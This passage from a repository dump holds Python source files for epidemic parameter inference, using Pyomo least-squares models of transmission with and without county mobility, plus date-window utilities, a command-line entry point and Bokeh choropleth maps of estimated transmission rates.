If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n if len(analysis_window) != 0:\n raise NotImplementedError('analysis_window is not yet implemented for multinode_decay_lsq')\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.report_delay = report_delay\n model.reporting_factor = reporting_factor\n\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n # for now, alpha is not used\n # model.alpha = pe.Var(initialize=1.0)\n # model.alpha.fix(1.0)\n\n #model.A = pe.Set(initialize=[v for v in cumulative_reported_cases.keys().to_list()])\n model.A = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = float(populations.iloc[nodeid]) # overall population\n cm_rep_cases_node = [v[0] for v in cumulative_reported_cases.iloc[:, [nodeid] ].values]\n\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = \\\n recon.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases_node,\n population=B.N,\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n if verbose: # pragma: no cover\n print('corrected case data being used:')\n print(T)\n\n # define the set of times\n B.timesteps = [i for i in range(len(T))]\n B.TIMES = pe.Set(initialize=B.timesteps, ordered=True)\n #B.TIMES_m_one = pe.Set(initialize=B.timesteps[1:], ordered=True)\n\n # define the case count variables\n B.T_hat = pe.Var(B.TIMES, initialize=1.0)\n\n # infection process\n def _infection_process(b, t):\n return b.T_hat[t] == model.beta * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n B.infection_process = pe.Constraint(B.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(b):\n return sum( (b.T_hat[t] - T[t])**2 for t in b.TIMES)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n return model\n\n" }, { "alpha_fraction": 0.7633135914802551, "alphanum_fraction": 0.7633135914802551, "avg_line_length": 20.125, "blob_id": "a759cab50f4d17730484a1d61fcb96e2285afe14", "content_id": "acb6e0abeb2c878a120a9968f4fd6e9ce47505c0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 169, "license_type": "no_license", "max_line_length": 31, "num_lines": 8, "path": "/epi_inference/engine/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# Defining core engine logic\n\nfrom . import task\nfrom . import task_registry\nfrom . import config_parameters\nfrom . import misc\nfrom . import util\nfrom . 
import meta_wf\n" }, { "alpha_fraction": 0.541436493396759, "alphanum_fraction": 0.5469613075256348, "avg_line_length": 31.417909622192383, "blob_id": "057714f186cfc1a4d618c06a27247365c147d9be", "content_id": "73c06f4812aaaa477c07d10d05fc0f24b65c9081", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2172, "license_type": "no_license", "max_line_length": 103, "num_lines": 67, "path": "/epi_inference/formulations/util.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['get_windows']\n\nimport datetime\nfrom pyutilib.misc import Options\n\ndef get_windows(dates, last_day_of_window=5, window_days=7, select_window=None):\n ans = Options()\n ans.TIMES = [i for i in range(len(dates))]\n ans.WINDOW_TIMES_LIST = []\n ans.WINDOWS = []\n ans.WINDOW_TIMES = {}\n\n for i in ans.TIMES:\n if datetime.date.fromisoformat(dates[i]).weekday() != last_day_of_window:\n continue\n #if i < window_days-1:\n if i < window_days:\n continue\n\n ans.WINDOW_TIMES[i] = []\n for j in range(i+1-window_days, i+1):\n ans.WINDOW_TIMES_LIST.append((i,j)) \n ans.WINDOW_TIMES[i].append(j) \n ans.WINDOWS.append(i)\n\n if len(ans.WINDOWS) == 0:\n return ans\n\n if select_window is not None:\n if select_window == 'last':\n select_val = ans.WINDOWS[-1]\n ans.WINDOWS = [select_val]\n ans.WINDOW_TIMES_LIST = [(i,j) for i,j in ans.WINDOW_TIMES_LIST if i==select_val]\n ans.WINDOW_TIMES = {select_val:ans.WINDOW_TIMES[select_val]}\n else:\n select_val=None\n for i in ans.WINDOWS:\n if datetime.date.fromisoformat(dates[i]) == datetime.date.fromisoformat(select_window):\n select_val=i\n break\n if select_val == None:\n ans.WINDOWS = []\n ans.WINDOW_TIMES_LIST = []\n ans.WINDOW_TIMES = {}\n else:\n ans.WINDOWS = [select_val]\n ans.WINDOW_TIMES_LIST = [(i,j) for i,j in ans.WINDOW_TIMES_LIST if i==select_val]\n ans.WINDOW_TIMES = {select_val:ans.WINDOW_TIMES[select_val]}\n\n return ans\n\ndef indices_since_first_nonzero(data):\n idx_first = None\n for i,v in enumerate(data):\n if v > 0:\n idx_first = i\n break\n\n if idx_first is None:\n return [0]*len(data)\n\n indices_since_first_nz = list()\n for i in range(len(data)):\n indices_since_first_nz.append(0)\n if i > idx_first:\n indices_since_first_nz[i] = indices_since_first_nz[i-1]+1\n return indices_since_first_nz\n" }, { "alpha_fraction": 0.469696968793869, "alphanum_fraction": 0.7045454382896423, "avg_line_length": 17.85714340209961, "blob_id": "644c83880821c19c1b50eb2129ab200c7a5cc0a6", "content_id": "4ae8aaa8b2e09ba6fc970c84ef2b9ddae8b3bc6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 132, "license_type": "no_license", "max_line_length": 62, "num_lines": 7, "path": "/examples/expdata/exp1/info.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Experimental results generated for around_md seeded at 24031\n#\nbeta = 0.75\nR0 = 3.0\ngamma = 0.25\nsigma = 0.1923076923076923\n" }, { "alpha_fraction": 0.6181545853614807, "alphanum_fraction": 0.6289839744567871, "avg_line_length": 41.06296157836914, "blob_id": "1ce0e44121c806687d77a8857017542ad52de44b", "content_id": "55e5078d96ab7f00f699038b3c726c651403adb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11358, "license_type": "no_license", "max_line_length": 218, "num_lines": 270, "path": "/epi_inference/formulations/multinode_mobility_decay_lsq.py", "repo_name": "or-fusion/epi_inference", 
"src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nimport epi_inference.reconstruction.common as rcommon\nimport epi_inference.reconstruction.deterministic as recond\n\ndef run_multinode_mobility_decay_lsq(cm_rep_cases, populations, mobility, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n # ToDo: this needs to be passed in - for now create a default set of dates\n #Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_multinode_mobility_decay_lsq(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n mobility=mobility,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose\n )\n\n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n results = list()\n for i in m.NODES:\n d = dict()\n if m.beta[i].stale == True:\n d['est_beta'] = None\n d['status'] = 'stale'\n else:\n d['est_beta'] = value(m.beta[i])\n d['status'] = 'ok'\n d['population'] = populations[i]\n d['total_cases'] = cm_rep_cases[i][-1]\n d['FIPS'] = i\n results.append(d)\n\n return {'results': results}\n\n \"\"\" OLD RESULTS STRUCTURE\n # check that the beta value was successfully solved\n betas = list()\n status = list()\n fips = list()\n pops = list()\n casecount = list()\n for i in m.NODES:\n fips.append(i)\n pops.append(populations[i])\n 
casecount.append(cm_rep_cases[i][-1])\n if m.beta[i].stale == True or cm_rep_cases[i][-1] < 3:\n status.append('invalid_insufficient_data')\n betas.append(None)\n else:\n status.append('ok')\n betas.append(value(m.beta[i])) \n\n return {'est_beta':betas, 'status':status, 'population': pops, 'case_count':casecount, 'FIPS':fips}\n \"\"\"\n\n \"\"\"\n for i in m.beta:\n print('{},{},{},{},{}'.format(i, value(m.beta[i]), float(cm_rep_cases[i].values[-1]), populations[i], m.beta[i].stale))\n\n import matplotlib.pyplot as plt\n df = pd.DataFrame({'est_beta': [value(m.beta[i]) for i in m.beta if float(cm_rep_cases[i].values[-1]) > 10]})\n df.hist()\n plt.show()\n\n errors = dict()\n for c in m.NODES:\n cerrors = list()\n for t in m.TIMES:\n cerrors.append( (value(m.T_hat[c,t])-m.T_data[c][t])/max(1.0,m.T_data[c][t]) )\n errors[c] = cerrors\n\n df = pd.DataFrame(errors)\n df.plot()\n plt.show()\n quit()\n\n\n return {'est_beta': value(m.beta),'status': 'ok', 'msg': 'Optimal solution found'}\n \"\"\"\n\n\ndef create_inference_formulation_multinode_mobility_decay_lsq(Cdates, cumulative_reported_cases, populations, mobility, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, verbose=False):\n \"\"\"\n Creates a one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n reporting_factor : float\n The reporting factor (>1). 
If set to 5 this means 1 in 5 cases is reported\n\n    \"\"\"\n    if len(analysis_window) != 0:\n        raise NotImplementedError('analysis_window is not yet implemented for multinode_mobility_decay_lsq')\n    model = pe.ConcreteModel()\n\n    # Cached data\n    model.sigma = sigma\n    model.gamma_1 = gamma_1\n    model.gamma_2 = gamma_2\n    model.gamma_3 = gamma_3\n    model.eta = 0.5 # fraction of the day spent \"away\"\n    model.report_delay = report_delay\n    model.reporting_factor = reporting_factor\n\n    #model.NODES = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n    model.NODES = pe.Set(initialize=list(k for k in cumulative_reported_cases.keys()))\n    model.beta = pe.Var(model.NODES, initialize=1.0, bounds=(0,None)) # transmission parameter\n    # for now, alpha is not used\n    # model.alpha = pe.Var(initialize=1.0)\n    # model.alpha.fix(1.0)\n\n    model.mobility = dict(mobility)\n    #model.mobility = dict()\n    for i in model.NODES:\n        if i not in model.mobility:\n            model.mobility[i] = {}\n    model.populations = dict()\n    \n    model.T_data = dict()\n    model.I_data = dict()\n    model.S_data = dict()\n    for nodeid in model.NODES:\n        model.populations[nodeid] = float(populations[nodeid]) # overall population\n        cm_rep_cases_node = [v for v in cumulative_reported_cases[nodeid].values]\n        rdates, rcases = \\\n            rcommon.reported_cases_from_cumulative(Cdates, cm_rep_cases_node)\n\n        dates, T, S, E, I1, I2, I3, R = \\\n            recond.reconstruct_states_deterministic_decay(\n                Cdates=Cdates,\n                cumulative_reported_cases=cm_rep_cases_node,\n                population=model.populations[nodeid],\n                sigma=sigma,\n                gamma=gamma_1/3,\n                reporting_factor=reporting_factor,\n                report_delay=report_delay\n            )\n        model.T_data[nodeid] = T\n        model.I_data[nodeid] = dict()\n        model.I_data[nodeid]['I1'] = I1\n        model.I_data[nodeid]['I2'] = I2\n        model.I_data[nodeid]['I3'] = I3\n        model.S_data[nodeid] = S\n        \n        if not hasattr(model, 'TIMES'):\n            model.TIMES = pe.Set(initialize=[i for i in range(len(T))], ordered=True)\n\n    # define the variable for estimated transmissions\n    model.T_hat = pe.Var(model.NODES, model.TIMES, initialize=1.0)\n\n    # infection process\n    #\n    # NOTE: We need to be careful how we model borders. 
If the mobility matrix says we cross them, then \n # how do we model the impact of infection on that mobile population?\n #\n def _infection_process(m, i, t):\n percent_mobile = 0\n if i in m.mobility:\n percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i] if j in m.NODES)\n #percent_mobile = sum(m.mobility[i][j]/m.populations[i] for j in m.mobility[i])\n return m.T_hat[i,t] == m.beta[i] * (m.I_data[i]['I1'][t] + m.I_data[i]['I2'][t] + m.I_data[i]['I3'][t]) / m.populations[i] * m.S_data[i][t] * (1-m.eta*percent_mobile) \\\n + sum(m.beta[j] * (m.I_data[j]['I1'][t] + m.I_data[j]['I2'][t] + m.I_data[j]['I3'][t]) / m.populations[j] * m.S_data[i][t] * (m.eta*m.mobility[i][j]/m.populations[i]) for j in m.mobility[i] if j in m.NODES)\n #return m.T_hat[i,t] == m.beta * (I_data[i]['I1'][t] + I_data[i]['I2'][t] + I_data[i]['I3'][t]) * S_data[i][t] / m.populations[i]\n\n model.infection_process = pe.Constraint(model.NODES, model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m, i):\n return sum( (m.T_hat[i,t] - m.T_data[i][t])**2 for t in m.TIMES)\n model.lse = pe.Expression(model.NODES, rule=_lse)\n\n def _total_lse(m):\n return sum( m.lse[i] for i in m.NODES )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n return model\n\n" }, { "alpha_fraction": 0.6441593766212463, "alphanum_fraction": 0.6502363085746765, "avg_line_length": 31.04347801208496, "blob_id": "8f8bc032ab313b22382db403f515d3e922c1cf68", "content_id": "64c4526758431c9a0c43532301d16e76b94ed508", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1481, "license_type": "no_license", "max_line_length": 106, "num_lines": 46, "path": "/epi_inference/ATTIC/epiinf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# Main script for epi_inference\n#\nimport argparse\nfrom . import collect\nfrom . import inference\nfrom . 
import reconstruct\n\ndef main():\n Parser = argparse.ArgumentParser(description='inference models')\n Parser.add_argument('-v', '--verbose', action='store_true', default=False,\n help='Verbosity flag')\n subparsers = Parser.add_subparsers(title='subcommands', help=\"Help\", dest=\"subparser_name\")\n #\n # epiinf collect\n #\n parser1 = subparsers.add_parser('collect', help='Collect data for inference models')\n parser1.add_argument('config_file',\n help='YAML configuration file')\n parser1.set_defaults(subparser_func=collect.run)\n #\n # epiinf inference\n #\n parser2 = subparsers.add_parser('inference', help='Optimize an inference model')\n parser2.add_argument('config_file',\n help='YAML configuration file')\n parser2.set_defaults(subparser_func=inference.run)\n #\n # epiinf reconstruct\n #\n parser3 = subparsers.add_parser('reconstruct', help='Reconstruct disease propigation given case data')\n parser3.add_argument('config_file',\n help='YAML configuration file')\n parser3.set_defaults(subparser_func=reconstruct.run)\n #\n # Process arguments\n #\n args = Parser.parse_args()\n if args.subparser_name is None:\n Parser.print_help()\n return\n return args.subparser_func(args)\n\n\nif __name__ == \"__main__\":\n main()\n\n \n\n" }, { "alpha_fraction": 0.5705128312110901, "alphanum_fraction": 0.5848007202148438, "avg_line_length": 36.31123733520508, "blob_id": "162bacb5722e554f6c6e151fa18ad2066d8efcca", "content_id": "c42fa944f484d4785db317870795056365ff4f4f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12948, "license_type": "no_license", "max_line_length": 292, "num_lines": 347, "path": "/epi_inference/viz/choropleth/choropleth.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['create_us_choropleth_scenario', 'create_us_choropleth_summary']\n\nimport sys\nimport geopandas as gpd\nimport json\nimport os.path\n\ntry:\n from bokeh.io import output_notebook, save, show, output_file\n from bokeh.plotting import figure\n from bokeh.models import GeoJSONDataSource, LinearColorMapper, ColorBar, RangeSlider, PreText, CustomJS\n from bokeh.layouts import gridplot\n from bokeh.palettes import brewer\n from bokeh.resources import CDN\n bokeh_available=True\nexcept:\n bokeh_available=False\n\ncurrdir = os.path.dirname(__file__)\n\nNON_CONTINENTAL = set(['02','15','60','66','69','72','78'])\n\n\ndef get_values_scenario(gdf, results_json, date, value='beta', value_name='beta'):\n if date is None:\n index=-1\n for fips in results_json:\n datestring = results_json[fips]['date'][index]\n break\n else:\n for fips in results_json:\n index = results_json[fips]['date'].index(date)\n datestring = results_json[fips]['date'][index]\n break\n all_values = set()\n vals = []\n status = []\n for fips in gdf['fips']:\n if fips in results_json:\n status.append( results_json[fips]['status'][index] )\n else:\n status.append( None )\n\n if fips in results_json and results_json[fips]['status'][index] == 'ok':\n val = results_json[fips][value][index]\n vals.append(val)\n all_values.add(val)\n else:\n vals.append(None)\n\n ans = {}\n if len(all_values) == 0:\n return ans, None\n ans[value_name] = vals\n ans['Solver Status'] = status\n ans['Date'] = datestring\n return ans, max(all_values)\n\n\ndef create_us_choropleth_scenario(*, results_json, value_key, date=None, shapefile=os.path.join(currdir, 'data/cb_2019_us_county_5m.shp'), states=None, description=\"Unknown Bokeh Choropleth\", value_name=\"Value\", max_value=None, 
crange=None, cvalue=None, output_html=None, show_browser=False):\n if not bokeh_available:\n raise RuntimeError(\"Need to install bokeh package to generate choropleth visualization\")\n #\n # Load data and rename columns\n #\n gdf = gpd.read_file(shapefile)\n #print(gdf.head())\n if states is None:\n sfp = gdf['STATEFP'].to_list()\n sfp = [x not in NON_CONTINENTAL for x in sfp]\n gdf = gdf.loc[sfp, ]\n elif states == 'AK': \n gdf = gdf.loc[gdf['STATEFP'] == '02',]\n elif states == 'HI': \n gdf = gdf.loc[gdf['STATEFP'] == '15',]\n #\n # Setup data that will be presented\n #\n gdf = gdf[['GEOID', 'NAME', 'geometry']]\n gdf.columns = ['fips', 'county_name', 'geometry']\n all_values, max_value = get_values_scenario(gdf, results_json, date, value_key)\n datestring = all_values['Date']\n gdf.insert(1, \"solver_status\", all_values['Solver Status'])\n gdf.insert(1, \"plot_value\", all_values['beta'])\n #\n # Create GeoJSONDataSource\n #\n gdf_json = json.loads(gdf.to_json())\n json_data = json.dumps(gdf_json)\n geosource = GeoJSONDataSource(geojson = json_data)\n #\n # The color bar assumes values go from 0 to some maximum value. The use can specify the \n # maximum value on the scale, or it will be inferred here\n #\n if max_value is None:\n max_value = int(max_value)+1\n if crange is None:\n crange = [0, max_value]\n else:\n crange = list(crange)\n if cvalue is None:\n cvalue = [crange[0], crange[1]]\n else:\n cvalue = list(cvalue)\n if crange[1] > max_value:\n crange[1] = max_value\n if cvalue[1] > crange[1]:\n cvalue[1] = crange[1]\n if cvalue[0] < crange[0]:\n cvalue[0] = crange[0]\n \n tick_labels = {}\n for i in range(10):\n val = max_value * i/10.0\n tick_labels[str(val)] = '%.02f' % val\n tick_labels[str(max_value)] = '>=%d' % max_value\n\n palette = brewer['OrRd'][8]\n palette = ['white'] + list(palette[::-1])\n color_mapper = LinearColorMapper(palette = palette, low = 0, high = max_value)\n color_mapper.nan_color = 'darkgray'\n color_mapper.high_color = 'black'\n\n color_bar = ColorBar(color_mapper=color_mapper, label_standoff=8, width=500, height=20,\n border_line_color=None,\n bar_line_color='black',\n major_label_text_color='black',\n location = (-10,0), \n orientation='horizontal')\n\n p = figure(title = description+\" - \"+datestring,\n match_aspect=True,\n plot_width=1200,\n x_axis_location=None,\n y_axis_location=None,\n tools=\"pan,box_zoom,wheel_zoom,reset,hover,save\",\n tooltips=[ (\"Name\", \"@county_name\"), (\"FIPS\", \"@fips\"), (value_name, \"@plot_value\"), (\"Solver Status\", \"@solver_status\"), (\"(Long, Lat)\", \"($x, $y)\") ]\n )\n\n p.hover.point_policy = \"follow_mouse\"\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_color = None\n p.patches('xs','ys', \n source=geosource, \n fill_color={'field' :'plot_value', 'transform' : color_mapper},\n line_color='black',\n line_width=0.25,\n fill_alpha=1)\n\n p.add_layout(color_bar, 'below')\n\n # widgets\n range_slider = RangeSlider(start=crange[0], end=crange[1], value=cvalue, value_throttled=cvalue, step=0.1, width=500)\n select_code = \"\"\"\nvar maxval = cb_obj.value_throttled[1];\nvar minval = cb_obj.value_throttled[0];\n \ncolor_mapper.high = maxval;\ncolor_mapper.low = minval;\n\n\"\"\"\n callback = CustomJS(args=dict(range_slider=range_slider, color_mapper=color_mapper, plot=p), code = select_code)\n range_slider.js_on_change('value_throttled', callback)\n\n text = PreText(text='The low/high of the color mapper will be set to the values of the range slider\\nValues > max are shown in black\\nValues < min are 
shown in white\\nMissing values are shown in gray',width=800)\n \n # final plot layout\n final = gridplot([[p],[range_slider],[text]], toolbar_location=\"left\")\n\n print(\"Creating file: \"+output_html)\n output_file(output_html, mode='inline', title=\"US Choropleth Plot\")\n save(final)\n if show_browser:\n show(final)\n\n\ndef get_values_summary(gdf, summary_csv, date, value='qmean_filtered_est_beta'):\n if date is None:\n index=-1\n for fips in summary_csv:\n datestring = summary_csv[fips][index]['dates']\n summary_cols = set(summary_csv[fips][index].keys()) - set(['dates'])\n break\n else:\n for fips in summary_csv:\n for index in range(len(summary_csv[fips][index])):\n if date == summary_csv[fips][index]['dates']:\n datestring = date\n summary_cols = set(summary_csv[fips][index].keys()) - set(['dates'])\n break\n\n\n vals = {}\n for col in summary_cols:\n vals[col] = []\n all_values = set()\n status = []\n for fips in gdf['fips']:\n if fips in summary_csv:\n for col in summary_cols:\n val = summary_csv[fips][index][col]\n if val == '':\n vals[col].append(None)\n else:\n val = float(val)\n vals[col].append(val)\n if col == value:\n all_values.add(val)\n else:\n for col in summary_cols:\n vals[col].append(None)\n\n ans = {}\n if len(all_values) == 0:\n return ans, None\n for col in summary_cols:\n ans[col] = vals[col]\n ans['Date'] = datestring\n return ans, max(all_values)\n\n\ndef create_us_choropleth_summary(*, summary_csv, value_key, date=None, shapefile=os.path.join(currdir, 'data/cb_2019_us_county_5m.shp'), states=None, description=\"Unknown Bokeh Choropleth\", value_name=\"Value\", max_value=None, crange=None, cvalue=None, output_html=None, show_browser=False):\n if not bokeh_available:\n raise RuntimeError(\"Need to install bokeh package to generate choropleth visualization\")\n #\n # Load data and rename columns\n #\n gdf = gpd.read_file(shapefile)\n if states is None:\n sfp = gdf['STATEFP'].to_list()\n sfp = [x not in NON_CONTINENTAL for x in sfp]\n gdf = gdf.loc[sfp, ]\n elif states == 'AK': \n gdf = gdf.loc[gdf['STATEFP'] == '02',]\n elif states == 'HI': \n gdf = gdf.loc[gdf['STATEFP'] == '15',]\n #\n # Setup data that will be presented\n #\n gdf = gdf[['GEOID', 'NAME', 'geometry']]\n gdf.columns = ['fips', 'county_name', 'geometry']\n all_values, max_value = get_values_summary(gdf, summary_csv, date)\n datestring = all_values['Date']\n gdf.insert(1, \"mean_beta\", all_values['qmean_filtered_est_beta'])\n gdf.insert(1, \"q05_beta\", all_values['q05_filtered_est_beta'])\n gdf.insert(1, \"q95_beta\", all_values['q95_filtered_est_beta'])\n #\n # Create GeoJSONDataSource\n #\n gdf_json = json.loads(gdf.to_json())\n json_data = json.dumps(gdf_json)\n geosource = GeoJSONDataSource(geojson = json_data)\n #\n # The color bar assumes values go from 0 to some maximum value. 
The use can specify the \n # maximum value on the scale, or it will be inferred here\n #\n if max_value is None:\n max_value = int(max_value)+1\n if crange is None:\n crange = [0, max_value]\n else:\n crange = list(crange)\n if cvalue is None:\n cvalue = [crange[0], crange[1]]\n else:\n cvalue = list(cvalue)\n if crange[1] > max_value:\n crange[1] = max_value\n if cvalue[1] > crange[1]:\n cvalue[1] = crange[1]\n if cvalue[0] < crange[0]:\n cvalue[0] = crange[0]\n \n tick_labels = {}\n for i in range(10):\n val = max_value * i/10.0\n tick_labels[str(val)] = '%.02f' % val\n tick_labels[str(max_value)] = '>=%d' % max_value\n\n palette = brewer['OrRd'][8]\n palette = ['white'] + list(palette[::-1])\n color_mapper = LinearColorMapper(palette = palette, low = 0, high = max_value)\n color_mapper.nan_color = 'darkgray'\n color_mapper.high_color = 'black'\n\n color_bar = ColorBar(color_mapper=color_mapper, label_standoff=8, width=500, height=20,\n border_line_color=None,\n bar_line_color='black',\n major_label_text_color='black',\n location = (-10,0), \n orientation='horizontal')\n\n p = figure(title = description+\" - \"+datestring,\n match_aspect=True,\n plot_width=1200,\n x_axis_location=None,\n y_axis_location=None,\n tools=\"pan,box_zoom,wheel_zoom,reset,hover,save\",\n tooltips=[ (\"Name\", \"@county_name\"), (\"FIPS\", \"@fips\"), (\"5% Quantile Beta\", \"@q05_beta\"), (\"Mean Beta\", \"@mean_beta\"), (\"95% Quantile Beta\", \"@q95_beta\"), (\"(Long, Lat)\", \"($x, $y)\") ]\n )\n\n p.hover.point_policy = \"follow_mouse\"\n p.xgrid.grid_line_color = None\n p.ygrid.grid_line_color = None\n p.patches('xs','ys', \n source=geosource, \n fill_color={'field' :'mean_beta', 'transform' : color_mapper},\n line_color='black',\n line_width=0.25,\n fill_alpha=1)\n\n p.add_layout(color_bar, 'below')\n\n # widgets\n range_slider = RangeSlider(start=crange[0], end=crange[1], value=cvalue, value_throttled=cvalue, step=0.1, width=500)\n select_code = \"\"\"\nvar maxval = cb_obj.value_throttled[1];\nvar minval = cb_obj.value_throttled[0];\n \ncolor_mapper.high = maxval;\ncolor_mapper.low = minval;\n\n\"\"\"\n callback = CustomJS(args=dict(range_slider=range_slider, color_mapper=color_mapper, plot=p), code = select_code)\n range_slider.js_on_change('value_throttled', callback)\n\n text = PreText(text='The low/high of the color mapper will be set to the values of the range slider\\nValues > max are shown in black\\nValues < min are shown in white\\nMissing values are shown in gray',width=800)\n \n # final plot layout\n final = gridplot([[p],[range_slider],[text]], toolbar_location=\"left\")\n\n print(\"Creating file: \"+output_html)\n output_file(output_html, mode='inline', title=\"US Choropleth Plot\")\n save(final)\n if show_browser:\n show(final)\n\n\nif __name__ == \"__main__\":\n import os.path\n import json\n if os.path.exists(\"../../../examples/collects/results_countydata5_FL_windows_mobility.json\"):\n with open(\"../../../examples/collects/results_countydata5_FL_windows_mobility.json\",\"r\") as INPUT:\n results = json.load(INPUT)\n create_us_choropleth(results_json=results, value_key=\"beta\", date=\"2020-04-02\", description=\"Debugging\", crange=(0,10), cvalue=(0,3))\n else:\n create_us_choropleth(results_json={}, value_key=None, value_name=\"FOO\", description=\"Debugging\", crange=(0,10), cvalue=(0,3), max_value=1)\n\n" }, { "alpha_fraction": 0.5533650517463684, 